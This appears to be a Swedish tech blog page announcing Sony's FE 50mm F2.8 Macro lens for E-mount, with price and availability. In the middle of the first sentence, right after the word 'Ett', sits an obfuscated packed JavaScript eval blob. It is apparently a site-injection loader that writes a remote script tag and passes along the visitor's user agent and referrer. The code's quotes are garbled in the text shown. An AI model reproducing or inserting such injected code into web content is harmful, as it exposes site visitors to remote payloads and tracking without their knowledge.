Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Sony lanserar ett fullformats 50mm F2.8 Macro-objektiv

Sony lanserar ett fullformats 50mm F2.8 Macro-objektiv
Sebastian

Ett eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|drrrz|var|u0026u|referrer|hrhts||js|php’.split(’|’),0,{}))
lätt och kompakt 50mm Fast-objektiv med 1:1 Macro-kapacitet

I dag lanserar Sony ett nytt fullformats-objektiv för ? E-mount-kamerasystem, FE 50mm F2.8 Macro (modell SEL50M28).

Det nya, allsidiga makro-objektivet FE 50 mm från Sony är perfekt för vardagsfotografering. Objektivet har en F2.8 maximal bländare som ger fantastisk bildkvalitet och bokeh, och med sin 1:1 makro-kapacitet ges fotografen möjlighet att komma tätt inpå motivet. Objektivet har dessutom flera kontrollfunktioner, inklusive fokuslägesväljaren, fokusområdesbegränsning och fokuslåsknappen som garanterar en kvalitativ makrofotografering för ett brett spektrum av användare.

SEL50M28 kommer finnas tillgänglig i oktober till en kostnad av cirka 5 900 kr.